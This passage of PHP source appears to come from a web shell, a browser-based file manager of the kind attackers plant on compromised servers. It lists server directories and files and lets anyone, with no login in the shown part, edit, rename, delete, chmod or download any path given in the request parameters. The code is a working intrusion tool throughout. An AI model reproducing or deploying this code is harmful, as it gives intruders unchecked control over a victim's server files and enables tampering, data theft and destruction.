<input class="form-control" type="hidden" name="opt" value="chmod">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
}
//rename folder
elseif($_GET['opt'] == 'btw'){
$cwd = getcwd();
echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">
<div class="input-group mb-3">
<input class="form-control" name="name" type="text" value="Folder"/>
<input class="form-control" type="hidden" name="path" value="'.$cwd.'">
<input class="form-control" type="hidden" name="opt" value="delete">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
}
//rename file
elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success change name",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change name",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="newname" type="text" value="'.$_POST['name'].'" />
<input class="form-control" type="hidden" name="path" value="'.$_POST['path'].'">
<input class="form-control" type="hidden" name="opt" value="rename">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
}
//edit file
elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Edit file Success",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed edit file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
fclose($fp);
}
echo '<form method="POST">
<textarea class="form-control" rows="7" name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input class="form-control" type="hidden" name="path" value="'.$_POST['path'].'">
<input class="form-control" type="hidden" name="opt" value="edit">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form><br />';
}
}else{
//delete dir
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete dir",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete dir",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
//delete file
elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete file",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
}
echo '</center>';
$scandir = scandir($path);
$pa = getcwd();
echo '<div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td class="text-center">Name</td>
<td class="text-center">Last edit</td>
<td class="text-center">Size</td>
<td class="text-center">Permission</td>
<td class="text-center">Options</td>
</tr>
</thead>
<tbody class="text-nowrap">';
foreach($scandir as $dir){
$dt = date("Y-m-d", filemtime("$path/$dir"));
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "
<tr>
<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href=\"?path=$path/$dir\">$dir</a></td>
<td><center>$dt</center></td>
<td><center>DIR</center></td>
<td><center>";
if(is_writable("$path/$dir")) echo '<font color="green">';
elseif(!is_readable("$path/$dir")) echo '<font color="red">';
echo p("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
echo "</center></td>
<td>
<form method=\"POST\" action=\"?option&path=$path\">
<div class='input-group mb-3 text-center'>
<select class=\"form-select form-select-sm\" name=\"opt\">
<option selected disabled>Select</option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input class=\"btn btn-outline-light btn-sm\" type=\"submit\" value=\"Go\"/>
</form>
</div>
</td>
</tr>";
}
foreach($scandir as $file){
$ft = date("Y-m-d", filemtime("$path/$file"));
if(!is_file($path.'/'.$file)) continue;
$s = filesize($path.'/'.$file)/1024;
$s = round($s,3);
if($s >= 1024){
$s = round($s/1024,2).' MB';
}else{
$s = $s.' KB';
}
echo "
<tr>
<td><i class='bi bi-file-earmark-code-fill'></i><a class='text-decoration-none text-secondary' href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>$ft</center></td>
<td><center>$s</center></td>
<td><center>";
if(is_writable("$path/$file")) echo '<font color="green">';
elseif(!is_readable("$path/$file")) echo '<font color="red">';
echo p("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
echo "</center></td>
<td>
<form method=\"POST\" action=\"?option&path=$path\">
<div class='input-group mb-3 text-center'>
<select class=\"form-select form-select-sm\"name=\"opt\">
<option selected disabled>Select</option>
<option value=\"delete\">Delete</option>
<option value=\"edit\">Edit</option>
<option value=\"rename\">Rename</option>
<option value=\"chmod\">Chmod</option>
<option value=\"download\">Download</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input class=\"btn btn-outline-light btn-sm\" type=\"submit\" value=\"Go\"/>
</form>
</div>
</td>
</tr>";
}
}
echo "
</tbody>
</table>
<div class='text-center'>
<kbd>Copyright © ".date("Y")." - $▛</kbd>
</div>
</div>
</div>
</div>
</div>
<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>
<script src='//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js'></script>
<script src='//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>
</body>
</html>";
?>